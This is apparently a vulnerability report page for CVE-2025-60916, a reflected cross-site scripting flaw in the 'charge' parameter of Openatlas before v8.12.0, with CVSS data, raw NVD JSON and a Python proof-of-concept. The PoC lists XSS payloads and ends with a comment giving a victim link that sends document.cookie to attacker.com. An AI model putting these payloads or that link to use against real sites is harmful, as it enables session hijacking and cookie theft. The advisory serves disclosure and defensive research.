Security Vulnerability Report
中文
CVE-2025-60916 CVSS 5.4 MEDIUM

CVE-2025-60916

Published: 2025-11-24 16:15:51
Last Modified: 2025-11-28 16:22:50

Description

A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the charge parameter.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:* - VULNERABLE
Openatlas < v8.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60916 PoC - Openatlas Reflected XSS in /overview/network/ endpoint # Target: Openatlas before v8.12.0 # Parameter: charge def exploit_xss(target_url, payload): """ Exploit reflected XSS vulnerability in Openatlas Args: target_url: Base URL of vulnerable Openatlas instance payload: Malicious JavaScript payload to inject Returns: bool: True if request successful, False otherwise """ # Construct malicious URL with XSS payload in charge parameter exploit_url = f"{target_url}/overview/network/?charge={payload}" try: # Send HTTP GET request response = requests.get(exploit_url, timeout=10) # Check if payload is reflected in response (vulnerability confirmation) if payload in response.text: print(f"[+] XSS payload successfully reflected!") print(f"[+] Vulnerable URL: {exploit_url}") return True else: print("[-] Payload not found in response") return False except requests.RequestException as e: print(f"[-] Request failed: {e}") return False # Example payloads for testing if __name__ == "__main__": target = "http://vulnerable-server.com" # Basic XSS payload - cookie stealing payload = "<script>alert(document.cookie)</script>" # Alternative payloads (if filters exist) # payload = "<img src=x onerror=alert(document.domain) />" # payload = "<svg/onload=alert(localStorage.getItem('session'))>" exploit_xss(target, payload) # Attacker would send this link to victims: # http://vulnerable-server.com/overview/network/?charge=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60916", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:50.937", "lastModified": "2025-11-28T16:22:50.133", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the charge parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.12.0", "matchCriteriaId": "31077621-F722-46FF-9FFA-CD3D23CD1479"}]}]}], "references": [{"url": "https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-reflected-dom-based-xss-charge/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sec4you-pentest.com/schwachstellen/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}